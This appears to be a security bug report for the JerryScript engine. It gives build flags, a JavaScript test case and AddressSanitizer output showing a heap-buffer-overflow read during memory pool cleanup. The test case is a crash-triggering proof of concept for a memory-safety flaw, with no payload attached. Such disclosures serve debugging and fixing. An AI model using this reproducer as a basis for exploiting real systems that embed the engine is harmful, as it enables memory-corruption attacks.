Description
JerryScript revision
Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on
Test case
try {
[].length = {
valueOf: function() {
return String("abcdabcd").split("").push (-62167219200000,
'"\ubad"',
'"\u', new RegExp([
4294967294,
], "g").exec(1), 1, 1, 1, 1, 1, 1), Object.freeze (Array.prototype);
}
}
assert (false);
}
catch (e) {
Array.prototype.splice(Function.prototype, ("function a() { return 8; }"), this);
}
Output
Script Error: TypeError: Invalid argument type.
==97903==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf6000260 at pc 0x0809632c bp 0xfff4f018 sp 0xfff4f008
READ of size 4 at 0xf6000260 thread T0
#0 0x809632b in jmem_pools_collect_empty /home/jerryscript/jerry-core/jmem/jmem-poolman.c:165
#1 0x8095f01 in jmem_pools_finalize /home/jerryscript/jerry-core/jmem/jmem-poolman.c:44
#2 0x809553f in jmem_finalize /home/jerryscript/jerry-core/jmem/jmem-allocator.c:161
#3 0x804d6a6 in jerry_cleanup /home/jerryscript/jerry-core/api/jerry.c:255
#4 0x804b545 in main /home/jerryscript/jerry-main/main-unix.c:994
#5 0xf7801636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
#6 0x8049030 (/home/jerryscript/build/bin/jerry+0x8049030)
0xf6000260 is located 8 bytes to the right of 8-byte region [0xf6000250,0xf6000258)
allocated by thread T0 here:
#0 0xf7a35dee in malloc (/usr/lib32/libasan.so.2+0x96dee)
#1 0x809581b in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x80958eb in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:289
#3 0x8095952 in jmem_heap_alloc_block_internal /home/jerryscript/jerry-core/jmem/jmem-heap.c:308
#4 0x809606b in jmem_pools_alloc /home/jerryscript/jerry-core/jmem/jmem-poolman.c:85
#5 0x80c3351 in ecma_alloc_number /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:57
#6 0x806737c in ecma_create_float_number /home/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:487
#7 0x8067fc4 in ecma_copy_value /home/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:838
#8 0x8068172 in ecma_fast_copy_value /home/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:881
#9 0x8089f60 in ecma_op_object_find_own /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:505
#10 0x808a810 in ecma_op_object_get_with_receiver /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:830
#11 0x808a916 in ecma_op_object_get /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:799
#12 0x808a916 in ecma_op_object_get_by_uint32_index /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:862
#13 0x80c8d98 in ecma_op_array_get_to_string_at_index /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:310
#14 0x80c8ed9 in ecma_builtin_array_prototype_join /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:360
#15 0x80cd66a in ecma_builtin_array_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2653
#16 0x807aa06 in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1095
#17 0x807abac in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1119
#18 0x8083dce in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:782
#19 0x8084716 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1085
#20 0x80c885f in ecma_builtin_array_prototype_object_to_string /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:151
#21 0x80cd4d5 in ecma_builtin_array_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2596
#22 0x807aa06 in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1095
#23 0x807abac in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1119
#24 0x8083dce in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:782
#25 0x8084716 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1085
#26 0x80877f8 in ecma_op_general_object_ordinary_value /home/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:324
#27 0x8087718 in ecma_op_general_object_default_value /home/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:289
#28 0x808bc85 in ecma_op_object_default_value /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1720
#29 0x80803b5 in ecma_op_to_primitive /home/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:199
#30 0x80809c0 in ecma_op_to_string /home/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:413
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jerryscript/jerry-core/jmem/jmem-poolman.c:165 jmem_pools_collect_empty
Shadow bytes around the buggy address:
0x3ebffff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x3ec00000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ec00010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ec00020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ec00030: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
=>0x3ec00040: fa fa fd fa fa fa fd fa fa fa 00 fa[fa]fa fd fa
0x3ec00050: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x3ec00060: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x3ec00070: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
0x3ec00080: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
0x3ec00090: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==97903==ABORTING
Credits: This vulnerability is detected by chong from OWL337.